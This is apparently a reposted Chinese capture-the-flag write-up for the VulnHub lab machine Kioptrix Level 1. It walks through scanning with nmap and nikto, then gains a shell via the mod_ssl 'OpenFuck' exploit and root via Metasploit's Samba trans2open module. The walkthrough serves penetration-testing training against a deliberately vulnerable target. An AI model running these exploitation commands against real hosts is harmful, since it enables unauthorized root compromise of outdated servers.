虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
虚拟机简介:游戏的目的是通过任何可能的方式获取root用户访问权限
目标:1个flag
级别:初级
1、信息收集
1.1通过arp-scan检测主机IP地址
arp-scan 192.168.1.0/24
1.2 通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.1.6
查看开放22、80、111、139、443端口
2、渗透测试
2.1 HTTP渗透测试
1.访问站点
2.查看网页源代码
3.使用nikto测试站点
nikto -host http://192.168.1.6
存在CVE漏洞
2.2 漏洞利用方式1
1.查看存在mod_ssl漏洞
searchsploit mod_ssl
2.利用漏洞脚本
cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
apt install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto
3.查看文件权限并执行
chmod 777 OpenFuck
./OpenFuck
4.基于Apache版本
5.漏洞利用
./OpenFuck 0x6b 192.168.1.6 443 -c 40
获取到shell权限
6.获取到shell权限
由于需要联网下载库文件,网络不通只获取到Apache权限
2.3 漏洞利用方式2
1.查看smb版本
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.1.6
run
2.查找smb漏洞
提示有trans2open漏洞
3.使用msf漏洞利用
use exploit/linux/samba/trans2open
set rhosts 192.168.1.6
set target 0
run
获取到shell会话
4.连接shell会话
已经获取到root权限
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Kioptrix Level 1(#1)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论